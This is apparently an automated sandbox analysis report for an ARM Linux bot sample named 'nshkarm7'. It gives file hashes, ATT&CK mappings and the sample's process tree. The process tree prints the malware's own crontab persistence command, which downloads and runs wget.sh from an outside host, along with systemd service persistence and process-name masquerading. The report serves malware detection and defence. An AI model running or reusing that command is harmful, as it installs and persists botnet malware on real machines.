Analysis
-
max time kernel
138s -
max time network
165s -
platform
debian-12_armhf -
resource
debian12-armhf-20240221-en -
resource tags
arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
27-10-2024 11:33
Static task
static1
Behavioral task
behavioral1
Sample
nshkarm7
Resource
debian12-armhf-20240221-en
General
-
Target
nshkarm7
-
Size
100KB
-
MD5
ed1d2e14bea3ca635ba94cb3346845ce
-
SHA1
b9d6b2c6d796a6924281d301854e96b38a8f12c2
-
SHA256
0511626122126321b2a14924a2258e9161a10e803b1a313f855038f80f5e4047
-
SHA512
0ec3fe431bceda7af5ea506428fa90f4cfdc936974204c4f329202a405fbe2435f0feb7dc023d165f6ed5cc7d8ab6010aa63e513db1b04fb647ea051070c4a20
-
SSDEEP
3072:XogSNzRzKkAAyv4aU1D4ttX7oMNZ3Q0whD3MX:XVSNJKkAL4aU1D4ttLoMzQPhLMX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
nshkarm7pid process 705 nshkarm7 -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 81.169.136.222 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.h0TO7G crontab -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
nshkarm7description ioc process File opened for modification /lib/systemd/system/bot.service nshkarm7 -
Changes its process name 1 IoCs
Processes:
nshkarm7description ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd 705 nshkarm7 -
Command and Scripting Interpreter: Unix Shell 1 TTPs 1 IoCs
Execute scripts via Unix Shell.
-
Processes:
systemctlnshkarm7description ioc process File opened for reading /proc/filesystems systemctl File opened for reading /proc/mounts nshkarm7
Processes
-
/tmp/nshkarm7/tmp/nshkarm7 massload1⤵
- Renames itself
- Modifies systemd
- Changes its process name
- Reads runtime system information
PID:705 -
/bin/sh/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:707 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:712 -
/usr/bin/crontabcrontab -l3⤵PID:713
-
/bin/sh/bin/sh -c "/bin/systemctl enable bot"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:720 -
/bin/systemctl/bin/systemctl enable bot3⤵
- Reads runtime system information
PID:721
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
302B
MD5a4e30f6ce6fb6cf00e133f3c93fb5449
SHA167b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25
-
Filesize
306B
MD54e8f2dd2ff3982760f0088f33f22f0f1
SHA17ad467c66e98f869702876169dd916ad3033dc4e
SHA2566d1322cb3e7a0357ca60c53ad8841df0ec7ead693e6dc0336b3e684f8d1e728a
SHA51257f4f7d906555c98a746b44f412577673b7025e2b369b3ee637bdcf758a1de2ce38596e36c3e20bb1b6ea1a8bdca154cdbe3d688315bad06e042dd34153160ff